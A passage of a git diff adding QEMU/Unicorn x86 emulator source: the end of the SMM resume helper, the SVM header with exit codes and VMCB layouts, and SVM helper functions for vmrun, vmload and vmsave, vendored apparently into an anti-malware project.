cpu_x86_load_seg_cache(env, R_ES, 0, 0, 0xffffffff, + DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | + DESC_A_MASK); + cpu_x86_load_seg_cache(env, R_SS, 0, 0, 0xffffffff, + DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | + DESC_A_MASK); + cpu_x86_load_seg_cache(env, R_FS, 0, 0, 0xffffffff, + DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | + DESC_A_MASK); + cpu_x86_load_seg_cache(env, R_GS, 0, 0, 0xffffffff, + DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | + DESC_A_MASK); +} + +void helper_rsm(CPUX86State *env) +{ + X86CPU *cpu = x86_env_get_cpu(env); + CPUState *cs = CPU(cpu); + target_ulong sm_state; + int i, offset; + uint32_t val; + + sm_state = env->smbase + 0x8000; +#ifdef TARGET_X86_64 + cpu_load_efer(env, ldq_phys(cs->as, sm_state + 0x7ed0)); + + env->gdt.base = ldq_phys(cs->as, sm_state + 0x7e68); + env->gdt.limit = ldl_phys(cs->as, sm_state + 0x7e64); + + env->ldt.selector = lduw_phys(cs->as, sm_state + 0x7e70); + env->ldt.base = ldq_phys(cs->as, sm_state + 0x7e78); + env->ldt.limit = ldl_phys(cs->as, sm_state + 0x7e74); + env->ldt.flags = (lduw_phys(cs->as, sm_state + 0x7e72) & 0xf0ff) << 8; + + env->idt.base = ldq_phys(cs->as, sm_state + 0x7e88); + env->idt.limit = ldl_phys(cs->as, sm_state + 0x7e84); + + env->tr.selector = lduw_phys(cs->as, sm_state + 0x7e90); + env->tr.base = ldq_phys(cs->as, sm_state + 0x7e98); + env->tr.limit = ldl_phys(cs->as, sm_state + 0x7e94); + env->tr.flags = (lduw_phys(cs->as, sm_state + 0x7e92) & 0xf0ff) << 8; + + env->regs[R_EAX] = ldq_phys(cs->as, sm_state + 0x7ff8); + env->regs[R_ECX] = ldq_phys(cs->as, sm_state + 0x7ff0); + env->regs[R_EDX] = ldq_phys(cs->as, sm_state + 0x7fe8); + env->regs[R_EBX] = ldq_phys(cs->as, sm_state + 0x7fe0); + env->regs[R_ESP] = ldq_phys(cs->as, sm_state + 0x7fd8); + env->regs[R_EBP] = ldq_phys(cs->as, sm_state + 0x7fd0); + env->regs[R_ESI] = ldq_phys(cs->as, sm_state + 0x7fc8); + env->regs[R_EDI] = ldq_phys(cs->as, sm_state + 0x7fc0); + for (i = 8; i < 16; i++) { + env->regs[i] = ldq_phys(cs->as, sm_state + 0x7ff8 - i * 8); + } + env->eip = ldq_phys(cs->as, sm_state + 0x7f78); + cpu_load_eflags(env, ldl_phys(cs->as, sm_state + 0x7f70), + ~(CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C | DF_MASK)); + env->dr[6] = ldl_phys(cs->as, sm_state + 0x7f68); + env->dr[7] = ldl_phys(cs->as, sm_state + 0x7f60); + + cpu_x86_update_cr4(env, ldl_phys(cs->as, sm_state + 0x7f48)); + cpu_x86_update_cr3(env, ldl_phys(cs->as, sm_state + 0x7f50)); + cpu_x86_update_cr0(env, ldl_phys(cs->as, sm_state + 0x7f58)); + + for (i = 0; i < 6; i++) { + offset = 0x7e00 + i * 16; + cpu_x86_load_seg_cache(env, i, + lduw_phys(cs->as, sm_state + offset), + ldq_phys(cs->as, sm_state + offset + 8), + ldl_phys(cs->as, sm_state + offset + 4), + (lduw_phys(cs->as, sm_state + offset + 2) & + 0xf0ff) << 8); + } + + val = ldl_phys(cs->as, sm_state + 0x7efc); /* revision ID */ + if (val & 0x20000) { + env->smbase = ldl_phys(cs->as, sm_state + 0x7f00) & ~0x7fff; + } +#else + cpu_x86_update_cr0(env, ldl_phys(cs->as, sm_state + 0x7ffc)); + cpu_x86_update_cr3(env, ldl_phys(cs->as, sm_state + 0x7ff8)); + cpu_load_eflags(env, ldl_phys(cs->as, sm_state + 0x7ff4), + ~(CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C | DF_MASK)); + env->eip = ldl_phys(cs->as, sm_state + 0x7ff0); + env->regs[R_EDI] = ldl_phys(cs->as, sm_state + 0x7fec); + env->regs[R_ESI] = ldl_phys(cs->as, sm_state + 0x7fe8); + env->regs[R_EBP] = ldl_phys(cs->as, sm_state + 0x7fe4); + env->regs[R_ESP] = ldl_phys(cs->as, sm_state + 0x7fe0); + env->regs[R_EBX] = ldl_phys(cs->as, sm_state + 0x7fdc); + env->regs[R_EDX] = ldl_phys(cs->as, sm_state + 0x7fd8); + env->regs[R_ECX] = ldl_phys(cs->as, sm_state + 0x7fd4); + env->regs[R_EAX] = ldl_phys(cs->as, sm_state + 0x7fd0); + env->dr[6] = ldl_phys(cs->as, sm_state + 0x7fcc); + env->dr[7] = ldl_phys(cs->as, sm_state + 0x7fc8); + + env->tr.selector = ldl_phys(cs->as, sm_state + 0x7fc4) & 0xffff; + env->tr.base = ldl_phys(cs->as, sm_state + 0x7f64); + env->tr.limit = ldl_phys(cs->as, sm_state + 0x7f60); + env->tr.flags = (ldl_phys(cs->as, sm_state + 0x7f5c) & 0xf0ff) << 8; + + env->ldt.selector = ldl_phys(cs->as, sm_state + 0x7fc0) & 0xffff; + env->ldt.base = ldl_phys(cs->as, sm_state + 0x7f80); + env->ldt.limit = ldl_phys(cs->as, sm_state + 0x7f7c); + env->ldt.flags = (ldl_phys(cs->as, sm_state + 0x7f78) & 0xf0ff) << 8; + + env->gdt.base = ldl_phys(cs->as, sm_state + 0x7f74); + env->gdt.limit = ldl_phys(cs->as, sm_state + 0x7f70); + + env->idt.base = ldl_phys(cs->as, sm_state + 0x7f58); + env->idt.limit = ldl_phys(cs->as, sm_state + 0x7f54); + + for (i = 0; i < 6; i++) { + if (i < 3) { + offset = 0x7f84 + i * 12; + } else { + offset = 0x7f2c + (i - 3) * 12; + } + cpu_x86_load_seg_cache(env, i, + ldl_phys(cs->as, + sm_state + 0x7fa8 + i * 4) & 0xffff, + ldl_phys(cs->as, sm_state + offset + 8), + ldl_phys(cs->as, sm_state + offset + 4), + (ldl_phys(cs->as, + sm_state + offset) & 0xf0ff) << 8); + } + cpu_x86_update_cr4(env, ldl_phys(cs->as, sm_state + 0x7f14)); + + val = ldl_phys(cs->as, sm_state + 0x7efc); /* revision ID */ + if (val & 0x20000) { + env->smbase = ldl_phys(cs->as, sm_state + 0x7ef8) & ~0x7fff; + } +#endif + env->hflags &= ~HF_SMM_MASK; + cpu_smm_update(env); + + qemu_log_mask(CPU_LOG_INT, "SMM: after RSM\n"); + log_cpu_state_mask(CPU_LOG_INT, CPU(cpu), CPU_DUMP_CCOP); +} + +#endif /* !CONFIG_USER_ONLY */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/svm.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/svm.h new file mode 100644 index 0000000..188aa28 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/svm.h @@ -0,0 +1,222 @@ +#ifndef __SVM_H +#define __SVM_H + +#define TLB_CONTROL_DO_NOTHING 0 +#define TLB_CONTROL_FLUSH_ALL_ASID 1 + +#define V_TPR_MASK 0x0f + +#define V_IRQ_SHIFT 8 +#define V_IRQ_MASK (1 << V_IRQ_SHIFT) + +#define V_INTR_PRIO_SHIFT 16 +#define V_INTR_PRIO_MASK (0x0f << V_INTR_PRIO_SHIFT) + +#define V_IGN_TPR_SHIFT 20 +#define V_IGN_TPR_MASK (1 << V_IGN_TPR_SHIFT) + +#define V_INTR_MASKING_SHIFT 24 +#define V_INTR_MASKING_MASK (1 << V_INTR_MASKING_SHIFT) + +#define SVM_INTERRUPT_SHADOW_MASK 1 + +#define SVM_IOIO_STR_SHIFT 2 +#define SVM_IOIO_REP_SHIFT 3 +#define SVM_IOIO_SIZE_SHIFT 4 +#define SVM_IOIO_ASIZE_SHIFT 7 + +#define SVM_IOIO_TYPE_MASK 1 +#define SVM_IOIO_STR_MASK (1 << SVM_IOIO_STR_SHIFT) +#define SVM_IOIO_REP_MASK (1 << SVM_IOIO_REP_SHIFT) +#define SVM_IOIO_SIZE_MASK (7 << SVM_IOIO_SIZE_SHIFT) +#define SVM_IOIO_ASIZE_MASK (7 << SVM_IOIO_ASIZE_SHIFT) + +#define SVM_EVTINJ_VEC_MASK 0xff + +#define SVM_EVTINJ_TYPE_SHIFT 8 +#define SVM_EVTINJ_TYPE_MASK (7 << SVM_EVTINJ_TYPE_SHIFT) + +#define SVM_EVTINJ_TYPE_INTR (0 << SVM_EVTINJ_TYPE_SHIFT) +#define SVM_EVTINJ_TYPE_NMI (2 << SVM_EVTINJ_TYPE_SHIFT) +#define SVM_EVTINJ_TYPE_EXEPT (3 << SVM_EVTINJ_TYPE_SHIFT) +#define SVM_EVTINJ_TYPE_SOFT (4 << SVM_EVTINJ_TYPE_SHIFT) + +#define SVM_EVTINJ_VALID (1 << 31) +#define SVM_EVTINJ_VALID_ERR (1 << 11) + +#define SVM_EXITINTINFO_VEC_MASK SVM_EVTINJ_VEC_MASK + +#define SVM_EXITINTINFO_TYPE_INTR SVM_EVTINJ_TYPE_INTR +#define SVM_EXITINTINFO_TYPE_NMI SVM_EVTINJ_TYPE_NMI +#define SVM_EXITINTINFO_TYPE_EXEPT SVM_EVTINJ_TYPE_EXEPT +#define SVM_EXITINTINFO_TYPE_SOFT SVM_EVTINJ_TYPE_SOFT + +#define SVM_EXITINTINFO_VALID SVM_EVTINJ_VALID +#define SVM_EXITINTINFO_VALID_ERR SVM_EVTINJ_VALID_ERR + +#define SVM_EXIT_READ_CR0 0x000 +#define SVM_EXIT_READ_CR3 0x003 +#define SVM_EXIT_READ_CR4 0x004 +#define SVM_EXIT_READ_CR8 0x008 +#define SVM_EXIT_WRITE_CR0 0x010 +#define SVM_EXIT_WRITE_CR3 0x013 +#define SVM_EXIT_WRITE_CR4 0x014 +#define SVM_EXIT_WRITE_CR8 0x018 +#define SVM_EXIT_READ_DR0 0x020 +#define SVM_EXIT_READ_DR1 0x021 +#define SVM_EXIT_READ_DR2 0x022 +#define SVM_EXIT_READ_DR3 0x023 +#define SVM_EXIT_READ_DR4 0x024 +#define SVM_EXIT_READ_DR5 0x025 +#define SVM_EXIT_READ_DR6 0x026 +#define SVM_EXIT_READ_DR7 0x027 +#define SVM_EXIT_WRITE_DR0 0x030 +#define SVM_EXIT_WRITE_DR1 0x031 +#define SVM_EXIT_WRITE_DR2 0x032 +#define SVM_EXIT_WRITE_DR3 0x033 +#define SVM_EXIT_WRITE_DR4 0x034 +#define SVM_EXIT_WRITE_DR5 0x035 +#define SVM_EXIT_WRITE_DR6 0x036 +#define SVM_EXIT_WRITE_DR7 0x037 +#define SVM_EXIT_EXCP_BASE 0x040 +#define SVM_EXIT_INTR 0x060 +#define SVM_EXIT_NMI 0x061 +#define SVM_EXIT_SMI 0x062 +#define SVM_EXIT_INIT 0x063 +#define SVM_EXIT_VINTR 0x064 +#define SVM_EXIT_CR0_SEL_WRITE 0x065 +#define SVM_EXIT_IDTR_READ 0x066 +#define SVM_EXIT_GDTR_READ 0x067 +#define SVM_EXIT_LDTR_READ 0x068 +#define SVM_EXIT_TR_READ 0x069 +#define SVM_EXIT_IDTR_WRITE 0x06a +#define SVM_EXIT_GDTR_WRITE 0x06b +#define SVM_EXIT_LDTR_WRITE 0x06c +#define SVM_EXIT_TR_WRITE 0x06d +#define SVM_EXIT_RDTSC 0x06e +#define SVM_EXIT_RDPMC 0x06f +#define SVM_EXIT_PUSHF 0x070 +#define SVM_EXIT_POPF 0x071 +#define SVM_EXIT_CPUID 0x072 +#define SVM_EXIT_RSM 0x073 +#define SVM_EXIT_IRET 0x074 +#define SVM_EXIT_SWINT 0x075 +#define SVM_EXIT_INVD 0x076 +#define SVM_EXIT_PAUSE 0x077 +#define SVM_EXIT_HLT 0x078 +#define SVM_EXIT_INVLPG 0x079 +#define SVM_EXIT_INVLPGA 0x07a +#define SVM_EXIT_IOIO 0x07b +#define SVM_EXIT_MSR 0x07c +#define SVM_EXIT_TASK_SWITCH 0x07d +#define SVM_EXIT_FERR_FREEZE 0x07e +#define SVM_EXIT_SHUTDOWN 0x07f +#define SVM_EXIT_VMRUN 0x080 +#define SVM_EXIT_VMMCALL 0x081 +#define SVM_EXIT_VMLOAD 0x082 +#define SVM_EXIT_VMSAVE 0x083 +#define SVM_EXIT_STGI 0x084 +#define SVM_EXIT_CLGI 0x085 +#define SVM_EXIT_SKINIT 0x086 +#define SVM_EXIT_RDTSCP 0x087 +#define SVM_EXIT_ICEBP 0x088 +#define SVM_EXIT_WBINVD 0x089 +/* only included in documentation, maybe wrong */ +#define SVM_EXIT_MONITOR 0x08a +#define SVM_EXIT_MWAIT 0x08b +#define SVM_EXIT_NPF 0x400 + +#define SVM_EXIT_ERR -1 + +#define SVM_CR0_SELECTIVE_MASK (1 << 3 | 1) /* TS and MP */ + +QEMU_PACK( struct vmcb_control_area { + uint16_t intercept_cr_read; + uint16_t intercept_cr_write; + uint16_t intercept_dr_read; + uint16_t intercept_dr_write; + uint32_t intercept_exceptions; + uint64_t intercept; + uint8_t reserved_1[44]; + uint64_t iopm_base_pa; + uint64_t msrpm_base_pa; + uint64_t tsc_offset; + uint32_t asid; + uint8_t tlb_ctl; + uint8_t reserved_2[3]; + uint32_t int_ctl; + uint32_t int_vector; + uint32_t int_state; + uint8_t reserved_3[4]; + uint64_t exit_code; + uint64_t exit_info_1; + uint64_t exit_info_2; + uint32_t exit_int_info; + uint32_t exit_int_info_err; + uint64_t nested_ctl; + uint8_t reserved_4[16]; + uint32_t event_inj; + uint32_t event_inj_err; + uint64_t nested_cr3; + uint64_t lbr_ctl; + uint8_t reserved_5[832]; +}); + +QEMU_PACK( struct vmcb_seg { + uint16_t selector; + uint16_t attrib; + uint32_t limit; + uint64_t base; +}); + +QEMU_PACK( struct vmcb_save_area { + struct vmcb_seg es; + struct vmcb_seg cs; + struct vmcb_seg ss; + struct vmcb_seg ds; + struct vmcb_seg fs; + struct vmcb_seg gs; + struct vmcb_seg gdtr; + struct vmcb_seg ldtr; + struct vmcb_seg idtr; + struct vmcb_seg tr; + uint8_t reserved_1[43]; + uint8_t cpl; + uint8_t reserved_2[4]; + uint64_t efer; + uint8_t reserved_3[112]; + uint64_t cr4; + uint64_t cr3; + uint64_t cr0; + uint64_t dr7; + uint64_t dr6; + uint64_t rflags; + uint64_t rip; + uint8_t reserved_4[88]; + uint64_t rsp; + uint8_t reserved_5[24]; + uint64_t rax; + uint64_t star; + uint64_t lstar; + uint64_t cstar; + uint64_t sfmask; + uint64_t kernel_gs_base; + uint64_t sysenter_cs; + uint64_t sysenter_esp; + uint64_t sysenter_eip; + uint64_t cr2; + uint8_t reserved_6[32]; + uint64_t g_pat; + uint64_t dbgctl; + uint64_t br_from; + uint64_t br_to; + uint64_t last_excp_from; + uint64_t last_excp_to; +}); + +QEMU_PACK( struct vmcb { + struct vmcb_control_area control; + struct vmcb_save_area save; +}); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/svm_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/svm_helper.c new file mode 100644 index 0000000..085749d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/svm_helper.c @@ -0,0 +1,760 @@ +/* + * x86 SVM helpers + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "exec/cpu-all.h" +#include "exec/helper-proto.h" +#include "exec/cpu_ldst.h" + +/* Secure Virtual Machine helpers */ + +#if defined(CONFIG_USER_ONLY) + +void helper_vmrun(CPUX86State *env, int aflag, int next_eip_addend) +{ +} + +void helper_vmmcall(CPUX86State *env) +{ +} + +void helper_vmload(CPUX86State *env, int aflag) +{ +} + +void helper_vmsave(CPUX86State *env, int aflag) +{ +} + +void helper_stgi(CPUX86State *env) +{ +} + +void helper_clgi(CPUX86State *env) +{ +} + +void helper_skinit(CPUX86State *env) +{ +} + +void helper_invlpga(CPUX86State *env, int aflag) +{ +} + +void helper_vmexit(CPUX86State *env, uint32_t exit_code, uint64_t exit_info_1) +{ +} + +void cpu_vmexit(CPUX86State *nenv, uint32_t exit_code, uint64_t exit_info_1) +{ +} + +void helper_svm_check_intercept_param(CPUX86State *env, uint32_t type, + uint64_t param) +{ +} + +void cpu_svm_check_intercept_param(CPUX86State *env, uint32_t type, + uint64_t param) +{ +} + +void helper_svm_check_io(CPUX86State *env, uint32_t port, uint32_t param, + uint32_t next_eip_addend) +{ +} +#else + +static inline void svm_save_seg(CPUX86State *env, hwaddr addr, + const SegmentCache *sc) +{ + CPUState *cs = CPU(x86_env_get_cpu(env)); + + stw_phys(cs->as, addr + offsetof(struct vmcb_seg, selector), + sc->selector); + stq_phys(cs->as, addr + offsetof(struct vmcb_seg, base), + sc->base); + stl_phys(cs->as, addr + offsetof(struct vmcb_seg, limit), + sc->limit); + stw_phys(cs->as, addr + offsetof(struct vmcb_seg, attrib), + ((sc->flags >> 8) & 0xff) | ((sc->flags >> 12) & 0x0f00)); +} + +static inline void svm_load_seg(CPUX86State *env, hwaddr addr, + SegmentCache *sc) +{ + CPUState *cs = CPU(x86_env_get_cpu(env)); + unsigned int flags; + + sc->selector = lduw_phys(cs->as, + addr + offsetof(struct vmcb_seg, selector)); + sc->base = ldq_phys(cs->as, addr + offsetof(struct vmcb_seg, base)); + sc->limit = ldl_phys(cs->as, addr + offsetof(struct vmcb_seg, limit)); + flags = lduw_phys(cs->as, addr + offsetof(struct vmcb_seg, attrib)); + sc->flags = ((flags & 0xff) << 8) | ((flags & 0x0f00) << 12); +} + +static inline void svm_load_seg_cache(CPUX86State *env, hwaddr addr, + int seg_reg) +{ + SegmentCache sc1, *sc = &sc1; + + svm_load_seg(env, addr, sc); + cpu_x86_load_seg_cache(env, seg_reg, sc->selector, + sc->base, sc->limit, sc->flags); +} + +void helper_vmrun(CPUX86State *env, int aflag, int next_eip_addend) +{ + CPUState *cs = CPU(x86_env_get_cpu(env)); + target_ulong addr; + uint32_t event_inj; + uint32_t int_ctl; + + cpu_svm_check_intercept_param(env, SVM_EXIT_VMRUN, 0); + + if (aflag == 2) { + addr = env->regs[R_EAX]; + } else { + addr = (uint32_t)env->regs[R_EAX]; + } + + qemu_log_mask(CPU_LOG_TB_IN_ASM, "vmrun! " TARGET_FMT_lx "\n", addr); + + env->vm_vmcb = addr; + + /* save the current CPU state in the hsave page */ + stq_phys(cs->as, env->vm_hsave + offsetof(struct vmcb, save.gdtr.base), + env->gdt.base); + stl_phys(cs->as, env->vm_hsave + offsetof(struct vmcb, save.gdtr.limit), + env->gdt.limit); + + stq_phys(cs->as, env->vm_hsave + offsetof(struct vmcb, save.idtr.base), + env->idt.base); + stl_phys(cs->as, env->vm_hsave + offsetof(struct vmcb, save.idtr.limit), + env->idt.limit); + + stq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, save.cr0), env->cr[0]); + stq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, save.cr2), env->cr[2]); + stq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, save.cr3), env->cr[3]); + stq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, save.cr4), env->cr[4]); + stq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, save.dr6), env->dr[6]); + stq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, save.dr7), env->dr[7]); + + stq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, save.efer), env->efer); + stq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, save.rflags), + cpu_compute_eflags(env)); + + svm_save_seg(env, env->vm_hsave + offsetof(struct vmcb, save.es), + &env->segs[R_ES]); + svm_save_seg(env, env->vm_hsave + offsetof(struct vmcb, save.cs), + &env->segs[R_CS]); + svm_save_seg(env, env->vm_hsave + offsetof(struct vmcb, save.ss), + &env->segs[R_SS]); + svm_save_seg(env, env->vm_hsave + offsetof(struct vmcb, save.ds), + &env->segs[R_DS]); + + stq_phys(cs->as, env->vm_hsave + offsetof(struct vmcb, save.rip), + env->eip + next_eip_addend); + stq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, save.rsp), env->regs[R_ESP]); + stq_phys(cs->as, + env->vm_hsave + offsetof(struct vmcb, save.rax), env->regs[R_EAX]); + + /* load the interception bitmaps so we do not need to access the + vmcb in svm mode */ + env->intercept = ldq_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, + control.intercept)); + env->intercept_cr_read = lduw_phys(cs->as, env->vm_vmcb + + offsetof(struct vmcb, + control.intercept_cr_read)); + env->intercept_cr_write = lduw_phys(cs->as, env->vm_vmcb + + offsetof(struct vmcb, + control.intercept_cr_write)); + env->intercept_dr_read = lduw_phys(cs->as, env->vm_vmcb + + offsetof(struct vmcb, + control.intercept_dr_read)); + env->intercept_dr_write = lduw_phys(cs->as, env->vm_vmcb + + offsetof(struct vmcb, + control.intercept_dr_write)); + env->intercept_exceptions = ldl_phys(cs->as, env->vm_vmcb + + offsetof(struct vmcb, + control.intercept_exceptions + )); + + /* enable intercepts */ + env->hflags |= HF_SVMI_MASK; + + env->tsc_offset = ldq_phys(cs->as, env->vm_vmcb + + offsetof(struct vmcb, control.tsc_offset)); + + env->gdt.base = ldq_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, + save.gdtr.base)); + env->gdt.limit = ldl_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, + save.gdtr.limit)); + + env->idt.base = ldq_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, + save.idtr.base)); + env->idt.limit = ldl_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, + save.idtr.limit)); + + /* clear exit_info_2 so we behave like the real hardware */ + stq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, control.exit_info_2), 0); + + cpu_x86_update_cr0(env, ldq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, + save.cr0))); + cpu_x86_update_cr4(env, ldq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, + save.cr4))); + cpu_x86_update_cr3(env, ldq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, + save.cr3))); + env->cr[2] = ldq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.cr2)); + int_ctl = ldl_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, control.int_ctl)); + env->hflags2 &= ~(HF2_HIF_MASK | HF2_VINTR_MASK); + if (int_ctl & V_INTR_MASKING_MASK) { + env->v_tpr = int_ctl & V_TPR_MASK; + env->hflags2 |= HF2_VINTR_MASK; + if (env->eflags & IF_MASK) { + env->hflags2 |= HF2_HIF_MASK; + } + } + + cpu_load_efer(env, + ldq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.efer))); + env->eflags = 0; + cpu_load_eflags(env, ldq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, + save.rflags)), + ~(CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C | DF_MASK)); + + svm_load_seg_cache(env, env->vm_vmcb + offsetof(struct vmcb, save.es), + R_ES); + svm_load_seg_cache(env, env->vm_vmcb + offsetof(struct vmcb, save.cs), + R_CS); + svm_load_seg_cache(env, env->vm_vmcb + offsetof(struct vmcb, save.ss), + R_SS); + svm_load_seg_cache(env, env->vm_vmcb + offsetof(struct vmcb, save.ds), + R_DS); + + env->eip = ldq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.rip)); + + env->regs[R_ESP] = ldq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.rsp)); + env->regs[R_EAX] = ldq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.rax)); + env->dr[7] = ldq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.dr7)); + env->dr[6] = ldq_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, save.dr6)); + + /* FIXME: guest state consistency checks */ + + switch (ldub_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, control.tlb_ctl))) { + case TLB_CONTROL_DO_NOTHING: + break; + case TLB_CONTROL_FLUSH_ALL_ASID: + /* FIXME: this is not 100% correct but should work for now */ + tlb_flush(cs, 1); + break; + } + + env->hflags2 |= HF2_GIF_MASK; + + if (int_ctl & V_IRQ_MASK) { + CPUState *cs = CPU(x86_env_get_cpu(env)); + + cs->interrupt_request |= CPU_INTERRUPT_VIRQ; + } + + /* maybe we need to inject an event */ + event_inj = ldl_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, + control.event_inj)); + if (event_inj & SVM_EVTINJ_VALID) { + uint8_t vector = event_inj & SVM_EVTINJ_VEC_MASK; + uint16_t valid_err = event_inj & SVM_EVTINJ_VALID_ERR; + uint32_t event_inj_err = ldl_phys(cs->as, env->vm_vmcb + + offsetof(struct vmcb, + control.event_inj_err)); + + qemu_log_mask(CPU_LOG_TB_IN_ASM, "Injecting(%#hx): ", valid_err); + /* FIXME: need to implement valid_err */ + switch (event_inj & SVM_EVTINJ_TYPE_MASK) { + case SVM_EVTINJ_TYPE_INTR: + cs->exception_index = vector; + env->error_code = event_inj_err; + env->exception_is_int = 0; + env->exception_next_eip = -1; + qemu_log_mask(CPU_LOG_TB_IN_ASM, "INTR"); + /* XXX: is it always correct? */ + do_interrupt_x86_hardirq(env, vector, 1); + break; + case SVM_EVTINJ_TYPE_NMI: + cs->exception_index = EXCP02_NMI; + env->error_code = event_inj_err; + env->exception_is_int = 0; + env->exception_next_eip = env->eip; + qemu_log_mask(CPU_LOG_TB_IN_ASM, "NMI"); + cpu_loop_exit(cs); + break; + case SVM_EVTINJ_TYPE_EXEPT: + cs->exception_index = vector; + env->error_code = event_inj_err; + env->exception_is_int = 0; + env->exception_next_eip = -1; + qemu_log_mask(CPU_LOG_TB_IN_ASM, "EXEPT"); + cpu_loop_exit(cs); + break; + case SVM_EVTINJ_TYPE_SOFT: + cs->exception_index = vector; + env->error_code = event_inj_err; + env->exception_is_int = 1; + env->exception_next_eip = env->eip; + qemu_log_mask(CPU_LOG_TB_IN_ASM, "SOFT"); + cpu_loop_exit(cs); + break; + } + qemu_log_mask(CPU_LOG_TB_IN_ASM, " %#x %#x\n", cs->exception_index, + env->error_code); + } +} + +void helper_vmmcall(CPUX86State *env) +{ + cpu_svm_check_intercept_param(env, SVM_EXIT_VMMCALL, 0); + raise_exception(env, EXCP06_ILLOP); +} + +void helper_vmload(CPUX86State *env, int aflag) +{ + CPUState *cs = CPU(x86_env_get_cpu(env)); + target_ulong addr; + + cpu_svm_check_intercept_param(env, SVM_EXIT_VMLOAD, 0); + + if (aflag == 2) { + addr = env->regs[R_EAX]; + } else { + addr = (uint32_t)env->regs[R_EAX]; + } + + qemu_log_mask(CPU_LOG_TB_IN_ASM, "vmload! " TARGET_FMT_lx + "\nFS: %016" PRIx64 " | " TARGET_FMT_lx "\n", + addr, ldq_phys(cs->as, addr + offsetof(struct vmcb, + save.fs.base)), + env->segs[R_FS].base); + + svm_load_seg_cache(env, addr + offsetof(struct vmcb, save.fs), R_FS); + svm_load_seg_cache(env, addr + offsetof(struct vmcb, save.gs), R_GS); + svm_load_seg(env, addr + offsetof(struct vmcb, save.tr), &env->tr); + svm_load_seg(env, addr + offsetof(struct vmcb, save.ldtr), &env->ldt); + +#ifdef TARGET_X86_64 + env->kernelgsbase = ldq_phys(cs->as, addr + offsetof(struct vmcb, + save.kernel_gs_base)); + env->lstar = ldq_phys(cs->as, addr + offsetof(struct vmcb, save.lstar)); + env->cstar = ldq_phys(cs->as, addr + offsetof(struct vmcb, save.cstar)); + env->fmask = ldq_phys(cs->as, addr + offsetof(struct vmcb, save.sfmask)); +#endif + env->star = ldq_phys(cs->as, addr + offsetof(struct vmcb, save.star)); + env->sysenter_cs = ldq_phys(cs->as, + addr + offsetof(struct vmcb, save.sysenter_cs)); + env->sysenter_esp = ldq_phys(cs->as, addr + offsetof(struct vmcb, + save.sysenter_esp)); + env->sysenter_eip = ldq_phys(cs->as, addr + offsetof(struct vmcb, + save.sysenter_eip)); +} + +void helper_vmsave(CPUX86State *env, int aflag) +{ + CPUState *cs = CPU(x86_env_get_cpu(env)); + target_ulong addr; + + cpu_svm_check_intercept_param(env, SVM_EXIT_VMSAVE, 0); + + if (aflag == 2) { + addr = env->regs[R_EAX]; + } else { + addr = (uint32_t)env->regs[R_EAX]; + } + + qemu_log_mask(CPU_LOG_TB_IN_ASM, "vmsave! " TARGET_FMT_lx + "\nFS: %016" PRIx64 " | " TARGET_FMT_lx "\n", + addr, ldq_phys(cs->as, + addr + offsetof(struct vmcb, save.fs.base)), + env->segs[R_FS].base); + + svm_save_seg(env, addr + offsetof(struct vmcb, save.fs), + &env->segs[R_FS]); + svm_save_seg(env, addr + offsetof(struct vmcb, save.gs), + &env->segs[R_GS]); + svm_save_seg(env, addr + offsetof(struct vmcb, save.tr), + &env->tr); + svm_save_seg(env, addr + offsetof(struct vmcb, save.ldtr), + &env->ldt); + +#ifdef TARGET_X86_64 + stq_phys(cs->as, addr + offsetof(struct vmcb, save.kernel_gs_base), + env->kernelgsbase); + stq_phys(cs->as, addr + offsetof(struct vmcb, save.lstar), env->lstar); + stq_phys(cs->as, addr + offsetof(struct vmcb, save.cstar), env->cstar); + stq_phys(cs->as, addr + offsetof(struct vmcb, save.sfmask), env->fmask); +#endif + 